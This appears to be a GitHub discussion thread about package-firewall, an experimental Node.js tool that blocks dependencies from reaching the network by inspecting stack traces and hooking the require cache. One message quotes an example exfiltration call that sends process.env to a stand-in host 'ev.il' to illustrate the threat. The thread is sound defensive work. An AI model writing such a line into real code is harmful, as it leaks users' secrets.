Userspace network access control experiment

[naugtur]

I was playing around with a concept of controlling network access and came up with a way to leverage stack traces to track where access to network is requested while security polices in core don't exist yet.

The approach to blocking is pretty naive, I'm aware this can be circumvented by spawning a child process at this point, but seems to have a chance of working otherwise. Did I miss anything obvious?

https://www.npmjs.com/package/package-firewall

[lirantal]

@naugtur cool stuff. have you seen nodejs/node#22112 ?

[naugtur]

I need to follow security wg more closely, there's a lot of interesting stuff going on.

22112 is about process level access control, which - while interesting and badly needed - is not what I'm solving for. My usecase is preventing a dependency from doing something like:

request(`http://ev.il/${JSON.stringify(process.env)}`)

while generally being able to make outgoing http requests from the app logic regardless of libraries used.
So this is a module-level permission. Snapshot-based for ease of use.

[lirantal]

oh yeah, I know it's about process level but that PR lead to a discussion around dep-level controls as well. Some of which are:

1. This comment: process: initial impl of feature access control  node#22112 (comment)
2. This issue: Suggestion: add standard methods to limit APIs dependencies can use package-maintenance#92

Just thought it would perhaps help add more context for you :)

[naugtur]

Thanks. I should also find the slack channel where this is discussed I guess.

Looking forward to feedback on this experiment. Meantime I'll get more familiar with what other people were doing.

[sam-github]

package-firewall reviews all stack traces leading to requiring a net module

Can't net be found by looking in the require cache, rather than requiring it directly?

[naugtur]

I'm setting up a getter on the module cache, so onless module._cache and require cache are references to different objects, this should work. If they are, I can set up the same getter on both.

[fraxken]

@naugtur I close the issue since it seem a bit old. Maybe you should push some of your work to the Awesome Node.js Security repo ?

If you continue to do things don't hesitate to reopen an issue and present it to us at a meeting (personally I love this kind of projects ^^).

[naugtur]

Well, this experiment can't work with ESM because it was based on abusing the require cache.
But I'm working on something soooo much better now.
Will present at NodeConfEU 😉

[lirantal]

Can't wait!

[RafaelGSS]

Well, this experiment can't work with ESM because it was based on abusing the require cache. But I'm working on something soooo much better now. Will present at NodeConfEU wink

Ping us when the presentation goes public. I'd love to see.